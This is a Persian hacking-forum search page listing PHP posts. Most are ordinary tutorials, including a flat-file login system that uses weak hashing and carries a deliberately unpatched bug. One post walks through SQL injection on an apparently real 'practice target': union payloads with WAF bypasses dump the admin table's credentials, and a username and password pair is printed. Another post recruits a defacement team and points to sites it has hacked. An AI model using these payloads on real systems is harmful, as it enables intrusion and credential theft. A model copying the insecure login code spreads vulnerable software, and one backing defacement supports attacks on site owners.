رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'php'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.

  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد

جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان

آخرین بروزرسانی

  • شروع

    پایان

فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان

گروه

About Me

28 نتیجه پیدا شد

  1. MR.MSA

    آموزش تابع file_get_contents در php

    MR.MSA پاسخی ارسال کرد برای یک موضوع در PHP

    با سلام خدمت دوستان عزیز تابع file_get_contents در php یک از توابع مدیریت فایل ها در این زبان است . این تابع تمام اطلاعات داخل فایل یا url داده شده را به عنوان یک رشته می خواند . خواندن فایل: $data = file_get_contents('file.txt'); echo $data; در اینجا محتویات فایل file.txt به صورت رشته در متغیر data ذخیره میشود. خواندن فایل از ادرس: $data = file_get_contents('[Hidden Content]'); echo $data; در این کد محتوایت این ادرس که به صورت txt هست در متغیر data ذخیره و در خط دوم نمایش داده میشود. موفق و پیروز باشید.
  2. MR.MSA

    تابع ساده ساخت لاگ با php

    MR.MSA پاسخی ارسال کرد برای یک موضوع در PHP

    با سلام خدمت دوستان در این ویدئو یک تابع ساده رو با php نوشتم جهت ساخت لاگ و بررسی بازدید کنندگان یک صفحه که در ویدئو های بعد این رو ارتقا میدیم. لینک ویدئو در آپارات: [Hidden Content] کد ها: <?php function add_log($dir){ $dir = 'logs'; $filename = $dir.'/'.$_SERVER['REMOTE_ADDR'].'.php'; if(!is_file($filename)){ $fh = fopen($filename,'a'); fwrite($fh,"<?php die(); ?>\n"); fclose($fh); } $log = "Date: ".date('Y/m/d h:i:s')." User Agent: ".$_SERVER['HTTP_USER_AGENT']." URL: ".$_SERVER['REQUEST_URI']."\n"; $fh = fopen($filename,'a'); fwrite($fh,$log); fclose($fh); } add_log('logs'); موفق و پیروز باشید.
  3. Hackwin
    سلام دوستان ساختار اعمال ترافیک بر روی وبسایت ها چطور هست؟ برای مثال وقتی با ping تو cmd win اقدام به Dos میکنیم، در واقع چه نوع درخواست هایی برای سرور ارسال شده؟ و اینکه آیا با php هم این امر ممکنه؟ و اگه بله چطور؟
  4. MR.MSA

    صفحه ثبت نام و ورود بدون دیتابیس | با PHP

    MR.MSA پاسخی ارسال کرد برای یک موضوع در PHP

    با سلام خدمت دوستان عزیز امروز میخوایم باهم یک صفحه ورود بدون داشتن دیتابیس بسازیم که در کنارش صفحه ثبت نام هم موجوده و کاربران میتونن ثبت نام کنن. نوشتن صفحه ثبت نام: قدم اول :خب قدم اول توی نوشتن صفحه ثبت ناممون کد های html هست که یک فایل با نام register.php بسازید و کد های زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> در اینجا چهار input داریم که شامل نام کاربری، رمز عبور ، تکرار رمز عبور و ایمیل میشه و در نهایت یک دکمه ثبت نام. قدم دوم : یک فایل با نام users.php بسازید و این کد رو خط اول قرار بدید: <?php die('403'); ?> خب در فایل users.php اطلاعات کاربران اعم از username و password و email قرار میگیره که از تابع die اول کدمون استفاده کردیم که اگر یک نفر این فایل رو توی سایت اجرا کرد خطای 403 بگیره. قدم سوم: حالا برمیگردیم به فایل register.php که کد های php اونو بزنیم یعنی: <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } خط ۲ : از if استفاده کردیم برای بررسی اینکه کاربر دکمه register رو کلیک کرده یا نه خط ۴ : بررسی کردیم که ایا تمام ایپویت ها رو وارد کرده کاربر یا نه خط ۶ : بررسی کردیم که آیا رمز عبود و تکرار رمز عبور دقیقا یکی هست یا نه اگه آره که بریم سراغ اضافه کردن کاربر خط ۱۰ : وارد فایل users.php که قبلا ساختیم میشیم و میشه file handle ما خط ۱۳ : توی متغیر user اطلاعات کاربر رو قرار میدم یعنی نام کاربری ، رمز عبود و ایمیل که نام کاربری و رمز عبود به صورت هش شده و ایمیل به صورت encode قرار میگیره. خط ۱۶ : با تابع fwrite در آخر فایل users.php متغیر user رو اضافه میکنیم. خط ۱۹ : فایل users.php رو میبندیم خط ۲۲ و ۲۳ : نمایش خطا زمانی که تمام اینپوت ها رو کاربر وارد نکرده که میشه else شرطمون (خط ۴) کد نهایی: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } } نوشتن صفحه ورود: قدم اول: یک فایل با نام login.php بسازید و کد های html زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> (اگه دوست داشته باشید میتونید بهش استایل هم بدید ولی برای اینکه آموزش طولانی نشه ما اینکارو نمیکنیم) قدم دوم : کد های php: <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } خب به صورت کلی بخوایم توضیح بدیم که چه اتفاقی افتاده میگیم که اول چک میکنه که ایا username,password ارسال شده یا نه بعد میاد فایل users.php رو باز میکنه با mode خواندن یا read بعد متغیر users رو مساوی با داده های فایل users.php قرار میده حالا میایم دوباره متغیر users رو تعریف میکنیم و با استفاده از تابع explode هر اینتری که توی فایل هست(میشه همون متغیر users) رو توی یک اندیس ارایه قرار میدم. یک متغیر user_id هم تعریف میکنیم چون بعدا ازش میخوایم استفاده کنیم خطای undefined var نده بهمون توی for میایم روی اندیس های آرایه users کار میکنیم و با یک if دونه دونه یوزر ها رو بررسی میکنیم با هش شده ی یوزرنیمی که برامون ارسال شده بعد اگر درست بود یعنی اون اندیس یا همون خط، اطلاعات یوزر ما هست که قرارش میدیم توی user_id و البته از .= که استفاده کردیم به این معنیه : $user_id = $user_id + $users[$i]; که اگر از قبل user_id رو تعریف نمیکردیم خطا میداد و دلیل اینکه از .= استفاده کردیم این بود که قراره توی بخش های بعد ازش استفاده کنیم. خب بعد اومدیم دوباره با یک if بررسی کردیم و با تابع strstr چک کردیم که آیا پسورد (به صورت هش شده) وجود داره توی اون اندیس یا نه در واقع پسورد رو بررسی میکنیم. و اگر درست بود میایم متغیر لاگین رو مساوی با true قرار میدیم که یعنی این شخص لاگینش انجام شده. جلوتر میایم میگیم اگر login شده بود بیا توی این شرط که اول میایم ایمیل رو از اون user خارج میکنیم و میزاریم توی متغیر email که روش های مختلفی میشه این کارو انجام داد ولی من از str_replace استفاده کردم حتی از explode هم میشه استفاده کرد و... در نهایت session رو استارت کردیم و session ها رو ست کردیم که من اومدم name رو مساوی با یوزر نیم و email رو مساوی با ایمیل شخص (با توجه به یوزرنیم و پسوردی که وارد کرده) به صورت دیکد قرار دادم. و هدر کردم به پنل که شما میتونید این قسمتش رو با توجه به کاری که میخواید انجام بدید تغییر بدید. و یک else هم داریم برای زمانی که یوزر و پسورد اشتباه هست ارور بده. کد نهایی پیج لاگین: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } نکته:‌ دوستان عزیز توی پیج ریجستر یک باگ خطرناک داریم که به شکل یک چالش میتونید بهش نگاه کنید، اگر دوستان تمایل داشتید در پایین تاپیک باگ رو ارائه بدید و همچنین نحوه پچ کردنش چون احتملا تا چند روز دیگه ادامه تاپیک نحوه بستن آسیب پذیری و نحوه استفاده از اون رو گداشتیم و یکم ریزه کاری پیج لاگین. موفق و پیروز باشید.
  5. Zed

    قطع کد های کاربردی برای برنامه نویسی وب

    Zed پاسخی ارسال کرد برای یک موضوع در HTML

    سلام باز هم منم 🙂 من دیدم مطالب کد های زیادی در مورد برنامه نویسی دارم گفتم این تاپیک رو بسازم که کد ها رو داخل این تاپیک بزارم یا اگر چیزی خواستم اضافه کنم اینجا اضافه کنم که اسپم نشه تو این تاپیک قطع کد های مفید از زبان های برنامه نویسی (بیشتر زبان های برنامه نویسی وب) رو میزارم خوشحال میشم اگر شما هم کدی داشتید اینجا به اشتراک بزارید ممنون که منو تحمل می کنید 🙂 به امید موفقیت همه هکر های ایرانی 🌹
  6. Reza.Black

    ساخت پیلود ساده ی php

    Reza.Black پاسخی ارسال کرد برای یک موضوع در آموزشهای تصویری

    به نام خدا سلام یک ویدیو ی ساده در مورد این موضوع تهیه کردم. Video.rar
  7. MR.MSA
    MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  8. nonamee

    Html,Css

    nonamee پاسخی ارسال کرد برای یک موضوع در HTML

    𝕚𝕟 𝕥𝕙𝕖 𝕟𝕒𝕞𝕖 𝕠𝕗 𝕘𝕠𝕕 با سلام و احترام خدمت تیم محترم 𝓰𝓾𝓪𝓻𝓭𝓲𝓻𝓪𝓷 در این تاپیک آموزش Html,Css را قرار خواهم داد ودر در دوره های بعدی با html5,css3 و جی کوئری ، بوت استرپ 4 ، پایگاه داده mysql و زبان برنامه نویسی php آشنا خواهید شد پس لطفا در تاپیک ها اسپم وارد نکنید و برای ادامه آموزش ها تاپیک ها را بپسندید
  9. nonamee

    تارگت برای آموزش Sqlinjection 2

    nonamee پاسخی ارسال کرد برای یک موضوع در تارگت های تمرینی

    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : [Hidden Content] با قرار دادن ' آسیب پذیری مشخص خواهد شد [Hidden Content]' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور [Hidden Content] order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group [Hidden Content] group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم [Hidden Content]' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت [Hidden Content]' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل [Hidden Content]' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
  10. MR.MSA

    ابزار های دیفیس گاردایران

    MR.MSA پاسخی ارسال کرد برای یک موضوع در ابزارهای امنیتی

    با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @Dr.Kali 4- @HCSH4C39 5- @mmj-sys 6- @KR0N0S 7- @SHIWPTS13 8- @Scary مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
  11. R3XCR4PY
    تابع date در php سلام در این تاپیک میخواهم تابع date در php را به شما آموزش بدهم. این تابع برای بدست آوردن تاریخ و زمان با فرمت دلخواه استفاده می شود. این متد دو پارامتر دارد که پارامتر اول اجباری و پارامتر دوم اختیاری است: date(format,timestamp); پارامتر اول - format: این پارامتر فرمت تاریخ و زمان را مشخص می کند. مثال: date("Y"); خروجی دستور بالا سال است. (مثلا اگر امسال 2020 باشد دستور بالا 2020 را بر میگرداند) حروف مهم (به حروف کوچک و بزرگ حساس است): a: این حرف am یا pm را در حروف کوچک بر می گرداند. A: این حرف am یا pm را در حروف بزرگ بر می گرداند. d: روز ماه D : روز هفته در سه حرف (مثلا اگر امروز شنبه باشد Sat) l (حروف کوچک L): روز هفته به صورت کامل (مثلا Saturday) F: نام ماه (مثلا January) m: ماه سال به صورت عدد M: ماه سال به صورت سه حرف (مثلا Jan) y: سال به صورت دو رقمی (مثلا 20) Y: سال به صورت چهار رقمی (مثلا 2020) z: روز سال h: ساعت در قالب ۱۲ ساعته H: ساعت در قالب ۲۴ ساعته i: دقیقه s: ثانیه مثال ها: date("Y-m-d"); // 2020-10-31 date("H:i:s"); // 18:34:53 date("Y/M/d-H:i:s"); // 2020/Oct/31-18:36:21 پارامتر دوم - timestamp: این پارامتر اختیاری است و اگر ارسال نشود زمان فعلی در نظر گرفته می شود و اگر به جای زمان فعلی، قصد استفاده از زمان دیگری استفاده کنیم این پارامتر را ارسال می کنیم. مثال: date("Y", mktime(0, 0, 0, 7, 1, 2000));
  12. mownten
    با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست.
  13. R3dC0d3r
    با سلام و درود خدمت تمامی اعضای محترم گارد ایران رد فریم ورک درواقع فریمورکی مدرن ، وابسته به الگوی مدل - ویو - کنترلر با بسیاری ابزار و اجزای ساختار یافته نوشته شده به زبان پی اچ پی و تلفیق شده با فریمورک سمت فرانت (رد جی اس) توسط اینجانب م.عزیزخانی به جهت رشد و پیشرفت جامع برنامه نویسی و استفاده هموطنان عزیز کشورمان توسعه داده شده . بعد از گذشت یک سال ، رد فریم ورک به ورژن 1.0.0 خودش رسیده و در 2 کیت عرضه شده : کیت جامع کیت جامع یک فریم ورک مدل - ویو - کنترلر و چند منظوره به جهت سازماندهی و سرعت بخشی روند توسعه است از برخی اجزای با کیفیت آن می توان به کامپونت های زیر اشاره کرد : موتور پایگاه داده قدرتمند قادر به پشتیبانی سه پایگاه داده معروف (MySQL, SQLServer, SQLite) ، سه جایگاه دیتابیس ، ORM با عملکرد بالا قادر به پیشتیبانی تمامی عملکرد های دیتابیس سیستم کد امنیتی آسان سرویس صندوق پست (SMTP Mail Server) سرویس آپلود امن سرویس ارزیابی ، فیلتر و زدودن رشته سیستم چند زبانه ساختار یافته سیستم مسیر یابی حرفه ای ، مجهز به Middleware ورودی های مدیریت شده (پارامتر های URL ، متد GET ، متد POST و ...) نشست های ساختار یافته و رمز گزاری شده ابزار عیب یابی قدرتمند و ... کیت کنسول اپلیکیشن کیت کنسول اپلیکیشن شامل تمامی اجزای ضروری و سیستم فرمان به جهت توسعه هرچه سریع تر کنسول اپلیکیشن در پی اچ پی آماده سازی شده است . به کمک این کیت قادرید کنسول اپلیکیشن پیشرفته خود را در بستر پی اچ پی توسعه دهید . رد آنالیتیکس رد فریم ورک همراه با یک ابزار قدرتمند به نام رد آنالیتیکس ارائه شده ؛ رد آنالیتیکس یک ابزار چند منظوره هست که به جهت سرعت بخشی روند توسعه مثل اجرای برنامه بر روی سرور توسعه ، تولید کردن کنترلر - مدل - ویو - میدل ور ، آنالیز روت ها یا فرمان های اپلیکیشن در دسترس توسعه دهنده قرار داده شده . رد آنالیتیکس به زبان شیرین جاوا به جهت یک برنامه Cross Platform برنامه نویسی شده ؛ با این حساب توسعه 